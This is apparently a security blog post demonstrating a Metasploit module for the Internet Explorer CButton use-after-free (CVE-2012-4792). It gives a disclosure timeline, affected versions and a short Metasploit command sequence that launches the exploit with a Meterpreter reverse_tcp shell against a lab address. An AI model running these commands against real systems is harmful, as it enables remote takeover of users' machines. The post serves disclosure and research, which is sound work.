aka wow on ZATAZ.com
Microsoft Internet Explorer CButton Vulnerability Metasploit Demo
Timeline :
CVE reference assigned the 2012-09-06
First samples of the attack discovered in Google cache the 2012-12-07
Vulnerability discovered exploited in the wild on CFE.org around the 2012-12-26
Vulnerability details provided by binjo, Eric Romang and FireEye the 2012-12-29
Microsoft Security Advisory published the 2012-12-30
Metasploit PoC provided the 2012-12-30
Metasploit module name changed the 2012-12-31
PoC provided by :
eromang
mahmud ab rahman
sinn3r
binjo
juan vazquez
Reference(s) :
CVE-2012-4792
MSA-2794220
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability
Attack and IE 0day Informations Used Against Council on Foreign Relations
CFR WATERING HOLE ATTACK DETAILS
Affected version(s) :
nternet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
Note: The module name has change from ie_cdwnbindinfo_uaf to ie_cbutton_uaf
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.
Commands :
use exploit/windows/browser/ie_cbutton_uaf set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sysinfo getuid
I recommend you to read these related posts
- Microsoft Release Security Advisory MSA-2794220 for CFE Internet Explorer 0day
- Attack and IE 0day Informations Used Against Council on Foreign Relations
- Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More
- Chinese Uygur Minority Also Targeted in the CFR Watering Hole Attack And More
- Microsoft Out-Of-Band Patch for Internet Explorer CVE-2012-4792 Vulnerability
- MS13-008 Patch Internet Explorer CVE-2012-4792 0day Vulnerability
- Department of Labor Watering Hole Campaign Review
- Watering Hole Campaign Use Latest Java and IE Vulnerabilities
- Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese
- A Deeper Look In CVE-2012-4792 Watering Hole Campaigns – Alljap Chapter
Logging In...
Leave a Reply Cancel reply
Last reply was 4 months ago
[...] though it only is configured for IE 8, and for Windows 7, Vista, XP (SP 3), or 2003. A demo? Eric Romang has got [...]
[...] Symantec, ISC, CNET, FireEye, Eric Romang [...]
[...] the way, Metasploit had delivered a Metasploit module for this zero-day. Specifically, this module exploits a vulnerability found in IE, where a use-after-free condition occurs when a CDwnBindInfo [...]
@eromang anyone tried this on XBOX / windows phone?
Can you provide me download link of affected internet explorer version on my email id plz